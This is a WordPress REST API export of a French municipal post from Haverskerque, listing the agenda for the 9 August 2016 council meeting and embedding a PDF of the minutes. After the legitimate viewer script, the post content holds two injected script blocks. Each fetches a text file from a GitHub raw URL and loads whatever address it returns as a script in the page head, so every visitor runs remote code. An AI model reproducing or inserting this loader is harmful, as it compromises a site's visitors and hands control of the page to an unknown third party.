{"id":2786,"date":"2016-08-10T15:22:00","date_gmt":"2016-08-10T13:22:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=2786"},"modified":"2024-07-29T06:40:57","modified_gmt":"2024-07-29T04:40:57","slug":"conseil-municipal-du-9-aout-2016","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/","title":{"rendered":"Conseil municipal du 9 Ao\u00fbt 2016"},"content":{"rendered":"\n<p>ORDRE DU JOUR :<br>Approbation des proc\u00e8s-verbaux des derni\u00e8res s\u00e9ances ;<br>Installation de nouveaux Conseillers Municipaux ;<br>Cr\u00e9ation de postes de Conseillers Municipaux d\u00e9l\u00e9gu\u00e9s ;<br>Indemnit\u00e9s de fonction des Maire, Adjoints et Conseillers Municipaux d\u00e9l\u00e9gu\u00e9s ;<br>Attribution de d\u00e9l\u00e9gations du Conseil Municipal au Maire ;<br>Mise en place des commissions communales ;<br>Election des d\u00e9l\u00e9gu\u00e9s au Centre Communal d\u2019Action Sociale ;<br>Election des d\u00e9l\u00e9gu\u00e9s au Conseil d\u2019Administration de la Maison de Retraite \u00ab\u00a0Baronnie du Val de Lys\u00a0\u00bb ;<br>Election des d\u00e9l\u00e9gu\u00e9s aux divers syndicats ;<br>Questions diverses.<\/p>\n\n\n\n<div class=\"_df_thumb \" id=\"df_2787\"  _slug=\"compte-rendu-du-conseil-municipal-du-09-aout-2016\" data-title=\"compte-rendu-du-conseil-municipal-du-09-aout-2016\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte rendu du Conseil Municipal du 09 ao\u00fbt 2016<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2787 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/05-2016-08-09_cpte_rendu_cm.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR :Approbation des proc\u00e8s-verbaux des derni\u00e8res s\u00e9ances ;Installation de nouveaux Conseillers Municipaux ;Cr\u00e9ation de postes de Conseillers Municipaux d\u00e9l\u00e9gu\u00e9s ;Indemnit\u00e9s de fonction des Maire, Adjoints et Conseillers Municipaux d\u00e9l\u00e9gu\u00e9s ;Attribution de d\u00e9l\u00e9gations du Conseil Municipal au Maire ;Mise en place des commissions communales ;Election des d\u00e9l\u00e9gu\u00e9s au Centre Communal d\u2019Action Sociale ;Election des d\u00e9l\u00e9gu\u00e9s au Conseil d\u2019Administration de la Maison de Retraite \u00ab\u00a0Baronnie du Val de Lys\u00a0\u00bb ;Election des d\u00e9l\u00e9gu\u00e9s aux divers syndicats ;Questions diverses.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-2786","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil municipal du 9 Ao\u00fbt 2016 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil municipal du 9 Ao\u00fbt 2016 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR :Approbation des proc\u00e8s-verbaux des derni\u00e8res s\u00e9ances ;Installation de nouveaux Conseillers Municipaux ;Cr\u00e9ation de postes de Conseillers Municipaux d\u00e9l\u00e9gu\u00e9s ;Indemnit\u00e9s de fonction des Maire, Adjoints et Conseillers Municipaux d\u00e9l\u00e9gu\u00e9s ;Attribution de d\u00e9l\u00e9gations du Conseil Municipal au Maire ;Mise en place des commissions communales ;Election des d\u00e9l\u00e9gu\u00e9s au Centre Communal d\u2019Action Sociale ;Election des d\u00e9l\u00e9gu\u00e9s au Conseil d\u2019Administration de la Maison de Retraite \u00ab\u00a0Baronnie du Val de Lys\u00a0\u00bb ;Election des d\u00e9l\u00e9gu\u00e9s aux divers syndicats ;Questions diverses.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2016-08-10T13:22:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:40:57+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil municipal du 9 Ao\u00fbt 2016\",\"datePublished\":\"2016-08-10T13:22:00+00:00\",\"dateModified\":\"2024-07-29T04:40:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/\"},\"wordCount\":111,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/\",\"name\":\"Conseil municipal du 9 Ao\u00fbt 2016 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2016-08-10T13:22:00+00:00\",\"dateModified\":\"2024-07-29T04:40:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2016\\\/08\\\/10\\\/conseil-municipal-du-9-aout-2016\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil municipal du 9 Ao\u00fbt 2016\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil municipal du 9 Ao\u00fbt 2016 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil municipal du 9 Ao\u00fbt 2016 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR :Approbation des proc\u00e8s-verbaux des derni\u00e8res s\u00e9ances ;Installation de nouveaux Conseillers Municipaux ;Cr\u00e9ation de postes de Conseillers Municipaux d\u00e9l\u00e9gu\u00e9s ;Indemnit\u00e9s de fonction des Maire, Adjoints et Conseillers Municipaux d\u00e9l\u00e9gu\u00e9s ;Attribution de d\u00e9l\u00e9gations du Conseil Municipal au Maire ;Mise en place des commissions communales ;Election des d\u00e9l\u00e9gu\u00e9s au Centre Communal d\u2019Action Sociale ;Election des d\u00e9l\u00e9gu\u00e9s au Conseil d\u2019Administration de la Maison de Retraite \u00ab\u00a0Baronnie du Val de Lys\u00a0\u00bb ;Election des d\u00e9l\u00e9gu\u00e9s aux divers syndicats ;Questions diverses.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2016-08-10T13:22:00+00:00","article_modified_time":"2024-07-29T04:40:57+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil municipal du 9 Ao\u00fbt 2016","datePublished":"2016-08-10T13:22:00+00:00","dateModified":"2024-07-29T04:40:57+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/"},"wordCount":111,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/","name":"Conseil municipal du 9 Ao\u00fbt 2016 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2016-08-10T13:22:00+00:00","dateModified":"2024-07-29T04:40:57+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2016\/08\/10\/conseil-municipal-du-9-aout-2016\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil municipal du 9 Ao\u00fbt 2016"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/2786","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=2786"}],"version-history":[{"count":2,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/2786\/revisions"}],"predecessor-version":[{"id":8353,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/2786\/revisions\/8353"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=2786"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=2786"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=2786"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}